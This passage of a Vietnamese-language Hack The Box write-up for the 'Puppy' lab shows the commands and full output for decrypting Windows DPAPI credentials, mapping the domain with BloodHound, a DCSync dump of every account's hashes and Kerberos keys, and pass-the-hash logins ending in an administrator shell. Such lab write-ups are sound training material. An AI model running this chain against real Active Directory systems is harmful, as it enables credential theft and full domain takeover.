> impacket-dpapi masterkey -file masterkey_blob -password 'ChefSteph2025!' -sid S-1-5-21-1487982659-1829050783-2281216199-1107

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies\

[MASTERKEYFILE]
Version : 2 (2)
Guid : 556a2412-1275-4ccf-b721-e6a0b4f90407
Flags : 0 (0)
Policy : 4ccf1275 (1288639093)
MasterKeyLen: 00000088 (136)
BackupKeyLen: 00000068 (104)
CredHistLen : 00000000 (0)
DomainKeyLen: 00000174 (372)

Decrypted key with User Key (MD4 protected)
Decrypted key: 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Bây giờ, giải mã(decode) tệp credential blob bằng masterkey

Decrypted key: 

1
0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b
1
2
3
4
5
6
7
8
9
10
11
12
13
14
> python3 /usr/share/doc/python3-impacket/examples/dpapi.py credential -f credential_blob -key 0xd9a570722fbaf7149f9f9d691b0e137b7413c1414c452f9c77d6d8a8ed9efe3ecae990e047debe4ab8cc879e8ba99b31cdb7abad28408d8d9cbfdcaf319e9c84

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[CREDENTIAL]
LastWritten : 2025-03-08 15:54:29
Flags : 0x00000030 (CRED_FLAGS_REQUIRE_CONFIRMATION|CRED_FLAGS_WILDCARD_MATCH)
Persist : 0x00000003 (CRED_PERSIST_ENTERPRISE)
Type : 0x00000002 (CRED_TYPE_DOMAIN_PASSWORD)
Target : Domain:target=PUPPY.HTB
Description :
Unknown :
Username : steph.cooper_adm
Unknown : FivethChipOnItsWay2025!

Tìm thấy thông tin người dùng và mật khẩu:

  • User: steph.cooper_adm
  • Password: FivethChipOnItsWay2025!

Tiếp tục quét bằng BloodHound.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
> bloodhound-python -dc DC.PUPPY.HTB -u 'steph.cooper_adm' -p 'FivethChipOnItsWay2025!' -d PUPPY.HTB -c All -o bloodhound_results.json -ns 10.10.11.70
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: puppy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_
ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC.PUPPY.HTB
INFO: Found 10 users
INFO: Found 56 groups
INFO: Found 3 gpos
INFO: Found 3 ous
INFO: Found 21 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.PUPPY.HTB
INFO: Done in 00M 21S
1
2
3
4
5
6
7
8
> zip bloodhound_results.zip bloodhound_results.json_20250517180922_*.json
 adding: bloodhound_results.json_20250517180922_computers.json (deflated 74%)
 adding: bloodhound_results.json_20250517180922_containers.json (deflated 93%)
 adding: bloodhound_results.json_20250517180922_domains.json (deflated 77%)
 adding: bloodhound_results.json_20250517180922_gpos.json (deflated 89%)
 adding: bloodhound_results.json_20250517180922_groups.json (deflated 94%)
 adding: bloodhound_results.json_20250517180922_ous.json (deflated 83%)
 adding: bloodhound_results.json_20250517180922_users.json (deflated 93%)

image.png

Người dùng steph.cooper_adm có quyền DCSync. Chúng ta sẽ tận dụng quyền này để lấy hash của administrator bằng cách thực hiện tấn công DCSync.

1
> impacket-secretsdump PUPPY.HTB/steph.cooper_adm:'FivethChipOnItsWay2025!'@10.10.11.70
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies

[*] Target system bootKey: 0xa943f13896e3e21f6c4100c7da9895a6
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9c541c389e2904b9b112f599fd6b333d:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Dumping cached domain logon information (domain/username:hash)
[*] Dumping LSA Secrets
[*] $MACHINE.ACC
PUPPY\DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
PUPPY\DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
PUPPY\DC$:des-cbc-md5:54e9a11619f8b9b5
PUPPY\DC$:plain_password_hex:84880c04e892448b6419dda6b840df09465ffda259692f44c2b3598d8f6b9bc1b0
bc37b17528d18a1e10704932997674cbe6b89fd8256d5dfeaa306dc59f15c1834c9ddd333af63b249952730bf256c3a
fb34a9cc54320960e7b3783746ffa1a1528c77faa352a82c13d7c762c34c6f95b4bbe04f9db6164929f9df32b953f0b4
19fbec89e2ecb268ddcccb4324a969a1997ae3c375cc865772baa8c249589e1757c7c36a47775d2fc39e566483d0fc
d48e29e6a384dc668228186a2196e48c7d1a8dbe6b52fc2e1392eb92d100c46277e1b2f43d5f2b188728a3e6e5f035
82a9632da8acfc4d992899f3b64fe120e13
PUPPY\DC$:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] DPAPI_SYSTEM
dpapi_machinekey:0xc21ea457ed3d6fd425344b3a5ca40769f14296a3
dpapi_userkey:0xcb6a80b44ae9bdd7f368fb674498d265d50e29bf
[*] NL$KM
0000 DD 1B A5 A0 33 E7 A0 56 1C 3F C3 F5 86 31 BA 09 ....3..V.?...1..
0010 1A C4 D4 6A 3C 2A FA 15 26 06 3B 93 E0 66 0F 7A ...j<*..&.;..f.z
0020 02 9A C7 2E 52 79 C1 57 D9 0C D3 F6 17 79 EF 3F ....Ry.W.....y.?
0030 75 88 A3 99 C7 E0 2B 27 56 95 5C 6B 85 81 D0 ED u.....+'V.\k....
NL$KM:dd1ba5a033e7a0561c3fc3f58631ba091ac4d46a3c2afa1526063b93e0660f7a029ac72e5279c157d90cd3f61779ef3f7588a399c7e02b2756955c6b8581d0ed
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:bb0edc15e49ceb4120c7bd7e6e65d775b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:a4f2989236a639ef3f766e5fe1aad94a:::
PUPPY.HTB\levi.james:1103:aad3b435b51404eeaad3b435b51404ee:ff4269fdf7e4a3093995466570f435b8:::
PUPPY.HTB\ant.edwards:1104:aad3b435b51404eeaad3b435b51404ee:afac881b79a524c8e99d2b34f438058b:::
PUPPY.HTB\adam.silver:1105:aad3b435b51404eeaad3b435b51404ee:a7d7c07487ba2a4b32fb1d0953812d66:::
PUPPY.HTB\jamie.williams:1106:aad3b435b51404eeaad3b435b51404ee:bd0b8a08abd5a98a213fc8e3c7fca780:::
PUPPY.HTB\steph.cooper:1107:aad3b435b51404eeaad3b435b51404ee:b261b5f931285ce8ea01a8613f09200b:::
PUPPY.HTB\steph.cooper_adm:1111:aad3b435b51404eeaad3b435b51404ee:ccb206409049bc53502039b80f3f1173:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:d5047916131e6ba897f975fc5f19c8df:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:c0b23d37b5ad3de31aed317bf6c6fd1f338d9479def408543b85bac046c596c0
Administrator:aes128-cts-hmac-sha1-96:2c74b6df3ba6e461c9d24b5f41f56daf
Administrator:des-cbc-md5:20b9e03d6720150d
krbtgt:aes256-cts-hmac-sha1-96:f2443b54aed754917fd1ec5717483d3423849b252599e59b95dfdcc92c40fa45
krbtgt:aes128-cts-hmac-sha1-96:60aab26300cc6610a05389181e034851
krbtgt:des-cbc-md5:5876d051f78faeba
PUPPY.HTB\levi.james:aes256-cts-hmac-sha1-96:2aad43325912bdca0c831d3878f399959f7101bcbc411ce204c37d585a6417ec
PUPPY.HTB\levi.james:aes128-cts-hmac-sha1-96:661e02379737be19b5dfbe50d91c4d2f
PUPPY.HTB\levi.james:des-cbc-md5:efa8c2feb5cb6da8
PUPPY.HTB\ant.edwards:aes256-cts-hmac-sha1-96:107f81d00866d69d0ce9fd16925616f6e5389984190191e9cac127e19f9b70fc
PUPPY.HTB\ant.edwards:aes128-cts-hmac-sha1-96:a13be6182dc211e18e4c3d658a872182
PUPPY.HTB\ant.edwards:des-cbc-md5:835826ef57bafbc8
PUPPY.HTB\adam.silver:aes256-cts-hmac-sha1-96:670a9fa0ec042b57b354f0898b3c48a7c79a46cde51c1b3bce9afab118e569e6
PUPPY.HTB\adam.silver:aes128-cts-hmac-sha1-96:5d2351baba71061f5a43951462ffe726
PUPPY.HTB\adam.silver:des-cbc-md5:643d0ba43d54025e
PUPPY.HTB\jamie.williams:aes256-cts-hmac-sha1-96:aeddbae75942e03ac9bfe92a05350718b251924e33c3f59fdc183e5a175f5fb2
PUPPY.HTB\jamie.williams:aes128-cts-hmac-sha1-96:d9ac02e25df9500db67a629c3e5070a4
PUPPY.HTB\jamie.williams:des-cbc-md5:cb5840dc1667b615
PUPPY.HTB\steph.cooper:aes256-cts-hmac-sha1-96:799a0ea110f0ecda2569f6237cabd54e06a748c493568f4940f4c1790a11a6aa
PUPPY.HTB\steph.cooper:aes128-cts-hmac-sha1-96:cdd9ceb5fcd1696ba523306f41a7b93e
PUPPY.HTB\steph.cooper:des-cbc-md5:d35dfda40d38529b
PUPPY.HTB\steph.cooper_adm:aes256-cts-hmac-sha1-96:a3b657486c089233675e53e7e498c213dc5872d79468fff14f9481eccfc05ad9
PUPPY.HTB\steph.cooper_adm:aes128-cts-hmac-sha1-96:c23de8b49b6de2fc5496361e4048cf62
PUPPY.HTB\steph.cooper_adm:des-cbc-md5:6231015d381ab691
DC$:aes256-cts-hmac-sha1-96:f4f395e28f0933cac28e02947bc68ee11b744ee32b6452dbf795d9ec85ebda45
DC$:aes128-cts-hmac-sha1-96:4d596c7c83be8cd71563307e496d8c30
DC$:des-cbc-md5:7f044607a8dc9710
[*] Cleaning up...

Sử dụng hash tìm được để kiểm tra với tài khoản administrator thông qua Evil-WinRM.

1
2
3
4
5
> crackmapexec winrm 10.10.11.70 -u 'administrator' -H 'bb0edc15e49ceb4120c7bd7e6e65d775b' -d PUPPY.HTB
HTTP 10.10.11.70 5985 10.10.11.70 [*] http://10.10.11.70:5985/wsman
/usr/lib/python3/dist-packages/spnego/_ntlm_raw/crypto.py:46: CryptographyDeprecationWarning: ARC4 has been moved to cryptography.hazmat.decrepit.ciphers.algorithms.ARC4 and will be removed from this module in 48.0.0.
 arc4 = algorithms.ARC4(self._key)
WINRM 10.10.11.70 5985 10.10.11.70 [+] PUPPY.HTB\administrator:bb0edc15e49ceb4120c7bd7e6e65d75b (Pwn3d!)

Chúng ta có thể kết nối qua Evil-WinRM bằng hash này.

1
> evil-winrm -i 10.10.11.70 -u administrator -H 'bb0edc15e49ceb4120c7bd7e6e65d775b'
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir

 Directory: C:\Users\Administrator\Desktop
 
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 5/17/2025 9:56 PM 34 root.txt

*Evil-WinRM* PS C:\Users\Administrator\Desktop>